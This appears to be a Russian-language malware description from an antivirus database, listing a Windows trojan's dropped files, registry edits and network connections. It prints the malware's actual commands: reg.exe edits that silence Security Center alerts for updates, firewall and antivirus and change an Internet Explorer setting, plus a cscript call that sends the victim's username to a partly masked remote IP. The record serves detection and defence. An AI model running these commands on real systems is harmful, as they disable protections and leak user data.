Техническая информация
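- Центр обеспечения безопасности (Security Center): отключаются уведомления об обновлениях, брандмауэре и антивирусе (параметры updatesdisablenotify, firewalldisablenotify и antivirusdisablenotify в приведённых ниже командах reg.exe)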
- '%TEMP%\wins.exe'
- '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\MAIN" /v "Extensions Off Page" /t REG_SZ /d "http://www.go###e.com.br" /f
- '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\internet settings" /v /t REG_DWORD /d 0x00000001 /f
- '<SYSTEM32>\cscript.exe' //nologo "%TEMP%\send31722.vbs" "http://21#.#19.158.170/go2/%USERNAME%-CRNJEUFU" ""
- '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\MAIN" /v "Extensions Off Page" /t REG_SZ /d "http://www.go###e.com.br" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Microsoft\security Center" /v updatesdisablenotify /t REG_DWORD /d 0x00000001 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System" /v /t REG_DWORD /d 0 /f
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\dev.bat" "
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Microsoft\security Center" /v firewalldisablenotify /t REG_DWORD /d 0x00000001 /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Microsoft\security Center" /v antivirusdisablenotify /t REG_DWORD /d 0x00000001 /f
- %TEMP%\1.tmp\dev.bat
- %TEMP%\send31722.vbs
- %TEMP%\foto.gif
- %TEMP%\wins.exe
- '21#.#19.158.170':80
- 'localhost':1038
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''